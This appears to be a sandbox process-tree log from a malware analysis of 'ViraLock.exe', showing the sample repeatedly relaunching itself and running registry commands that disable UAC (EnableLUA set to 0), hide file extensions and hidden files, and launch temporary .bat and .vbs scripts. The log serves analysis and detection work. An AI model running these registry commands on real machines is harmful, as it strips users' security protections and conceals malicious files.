        PID:5376
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        26⤵
        
        PID:4784
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        27⤵
        
        PID:5464
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        27⤵
        Modifies visibility of file extensions in Explorer
        Modifies registry key
        
        PID:5556
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        27⤵
        
        PID:5952
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        27⤵
        UAC bypass
        Modifies registry key
        
        PID:4572
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        28⤵
        
        PID:6028
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rwcAMkwM.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        27⤵
        
        PID:5404
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        28⤵
        
        PID:2440
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        25⤵
        Modifies visibility of file extensions in Explorer
        
        PID:5248
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        25⤵
        
        PID:2704
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        25⤵
        UAC bypass
        
        PID:5668
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ywEUYwgQ.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        25⤵
        
        PID:5900
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        26⤵
        
        PID:1820
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        23⤵
        Modifies visibility of file extensions in Explorer
        
        PID:5888
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        23⤵
        
        PID:5944
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        23⤵
        UAC bypass
        
        PID:1956
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WmYwYYUg.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        23⤵
        
        PID:5828
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        24⤵
        
        PID:5748
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        24⤵
        
        PID:5928
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        21⤵
        Modifies visibility of file extensions in Explorer
        
        PID:3248
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        21⤵
        
        PID:1236
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        22⤵
        
        PID:5424
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        21⤵
        UAC bypass
        Modifies registry key
        
        PID:5748
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zCoQEMUw.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        21⤵
        
        PID:5800
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        22⤵
        System Location Discovery: System Language Discovery
        
        PID:1604
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        19⤵
        Modifies visibility of file extensions in Explorer
        System Location Discovery: System Language Discovery
        
        PID:6004
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        19⤵
        
        PID:6012
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        19⤵
        UAC bypass
        System Location Discovery: System Language Discovery
        
        PID:6028
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\wCoAYsAE.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        19⤵
        
        PID:6056
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        20⤵
        
        PID:5604
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        17⤵
        Modifies visibility of file extensions in Explorer
        Modifies registry key
        
        PID:4448
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        17⤵
        Modifies registry key
        
        PID:1196
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        17⤵
        UAC bypass
        
        PID:2324
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FqcwgMck.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        17⤵
        
        PID:672
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        18⤵
        
        PID:5504
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        15⤵
        Modifies visibility of file extensions in Explorer
        System Location Discovery: System Language Discovery
        
        PID:4448
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        15⤵
        
        PID:672
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        15⤵
        UAC bypass
        Modifies registry key
        
        PID:1012
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RugkAAsk.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        15⤵
        
        PID:3048
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        16⤵
        System Location Discovery: System Language Discovery
        
        PID:5572
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        13⤵
        Modifies visibility of file extensions in Explorer
        Modifies registry key
        
        PID:2668
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        13⤵
        Modifies registry key
        
        PID:968
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        13⤵
        UAC bypass
        
        PID:4024
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\kawwgEgw.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        13⤵
        System Location Discovery: System Language Discovery
        
        PID:3248
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        14⤵
        
        PID:4988
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        11⤵
        Modifies visibility of file extensions in Explorer
        
        PID:2568
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        11⤵
        System Location Discovery: System Language Discovery
        
        PID:4056
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        11⤵
        UAC bypass
        
        PID:3260
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\MKgEowgw.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        11⤵
        
        PID:1184
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        12⤵
        
        PID:5100
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        12⤵
        
        PID:4916
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        9⤵
        Modifies visibility of file extensions in Explorer
        Modifies registry key
        
        PID:4144
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        9⤵
        Modifies registry key
        
        PID:2956
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        9⤵
        UAC bypass
        
        PID:5100
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Bewwkogk.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        9⤵
        
        PID:5052
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        10⤵
        
        PID:3876
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        7⤵
        Modifies visibility of file extensions in Explorer
        
        PID:3000
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        7⤵
        Modifies registry key
        
        PID:3500
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        7⤵
        UAC bypass
        
        PID:400
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\hIgccgok.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        7⤵
        
        PID:4396
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:4640
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        8⤵
        
        PID:2892
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        5⤵
        Modifies visibility of file extensions in Explorer
        
        PID:4812
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        5⤵
        Modifies registry key
        
        PID:2288
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        5⤵
        UAC bypass
        System Location Discovery: System Language Discovery
        Modifies registry key
        
        PID:4392
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FAUEIQkU.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        5⤵
        
        PID:1820
      - C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        6⤵
        
        PID:3700
- - C:\Windows\SysWOW64\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
    3⤵
    - Modifies visibility of file extensions in Explorer
    PID:1192
- - C:\Windows\SysWOW64\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
    3⤵
    - Modifies registry key
    PID:1692
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
    3⤵
    - UAC bypass
    - Modifies registry key
    PID:3472
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\XesIoYkM.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2956
  - - C:\Windows\SysWOW64\cscript.exe
      cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
      4⤵
      PID:3876
- C:\Users\Admin\Downloads\ViraLock.exe
  "C:\Users\Admin\Downloads\ViraLock.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1956
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2236
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:436
  - - C:\Users\Admin\Downloads\ViraLock.exe
      C:\Users\Admin\Downloads\ViraLock
      4⤵
      PID:5400
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        5⤵
        
        PID:5836
      - C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        6⤵
        
        PID:5172
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:5348
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        8⤵
        
        PID:6028
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        9⤵
        
        PID:440
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        10⤵
        
        PID:5800
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        11⤵
        
        PID:5332
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        12⤵
        
        PID:3396
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        13⤵
        
        PID:6052
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        13⤵
        Modifies visibility of file extensions in Explorer
        System Location Discovery: System Language Discovery
        
        PID:6096
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        14⤵
        
        PID:5108
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        13⤵
        Modifies registry key
        
        PID:5904
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        13⤵
        UAC bypass
        
        PID:5248
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\LMYMsIgQ.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        13⤵
        System Location Discovery: System Language Discovery
        
        PID:6080
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        14⤵
        
        PID:4812
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        14⤵
        
        PID:5256
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        11⤵
        Modifies visibility of file extensions in Explorer
        
        PID:1632
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        11⤵
        Modifies registry key
        
        PID:5360
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        12⤵
        
        PID:5228
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        11⤵
        UAC bypass
        
        PID:5844
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dsEkkEIk.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        11⤵
        
        PID:6060
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        12⤵
        
        PID:5168
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        12⤵
        
        PID:5692
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        9⤵
        Modifies visibility of file extensions in Explorer
        Modifies registry key
        
        PID:5228
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        9⤵
        
        PID:4696
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        9⤵
        UAC bypass
        
        PID:5760
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\IAcgYAoo.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        9⤵
        
        PID:5912
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        10⤵
        
        PID:5724
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        10⤵
        
        PID:5104
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        7⤵
        Modifies visibility of file extensions in Explorer
        
        PID:5648
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        7⤵
        System Location Discovery: System Language Discovery
        Modifies registry key
        
        PID:3048
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        7⤵
        UAC bypass
        Modifies registry key
        
        PID:4996
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:2892
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\vyYwUssg.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        7⤵
        
        PID:5600
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        8⤵
        
        PID:4516
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        5⤵
        Modifies visibility of file extensions in Explorer
        Modifies registry key
        
        PID:5996
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        5⤵
        Modifies registry key
        
        PID:6020
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        5⤵
        UAC bypass
        System Location Discovery: System Language Discovery
        Modifies registry key
        
        PID:6036
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mmMMgEYA.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        5⤵
        
        PID:6068
      - C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        6⤵
        
        PID:5556
- - C:\Windows\SysWOW64\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
    3⤵
    - Modifies visibility of file extensions in Explorer
    PID:1080
- - C:\Windows\SysWOW64\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
    3⤵
    - Modifies registry key
    PID:4280
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
    3⤵
    - UAC bypass
    PID:1144
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\liMwcAMI.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
    3⤵
    PID:912
  - - C:\Windows\SysWOW64\cscript.exe
      cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
      4⤵
      PID:5412
- C:\Users\Admin\Downloads\ViraLock.exe
  "C:\Users\Admin\Downloads\ViraLock.exe"
  2⤵
  PID:2200
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1920
  - - C:\Users\Admin\Downloads\ViraLock.exe
      C:\Users\Admin\Downloads\ViraLock
      4⤵
      PID:5460
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        5⤵
        
        PID:5684
      - C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        6⤵
        
        PID:5724
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:4928
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        8⤵
        
        PID:5624
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        9⤵
        System Location Discovery: System Language Discovery
        
        PID:5860
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        10⤵
        
        PID:1012
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        10⤵
        System Location Discovery: System Language Discovery
        
        PID:3848
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        11⤵
        
        PID:5324
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        12⤵
        
        PID:5472
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        12⤵
        
        PID:4468
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        13⤵
        
        PID:2396
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        14⤵
        
        PID:972
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        14⤵
        
        PID:5696
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        15⤵
        
        PID:5208
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        16⤵
        
        PID:5676
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        17⤵
        System Location Discovery: System Language Discovery
        
        PID:2212
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        18⤵
        
        PID:2376
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        17⤵
        Modifies visibility of file extensions in Explorer
        
        PID:232
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        18⤵
        
        PID:4996
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        17⤵
        
        PID:4864
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        18⤵
        
        PID:5664
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        17⤵
        UAC bypass
        System Location Discovery: System Language Discovery
        
        PID:5344
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HSsYUIcE.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        17⤵
        System Location Discovery: System Language Discovery
        
        PID:5700
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        18⤵
        
        PID:5836
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        15⤵
        Modifies visibility of file extensions in Explorer
        Modifies registry key
        
        PID:3900
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        15⤵
        System Location Discovery: System Language Discovery
        Modifies registry key
        
        PID:4448
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        15⤵
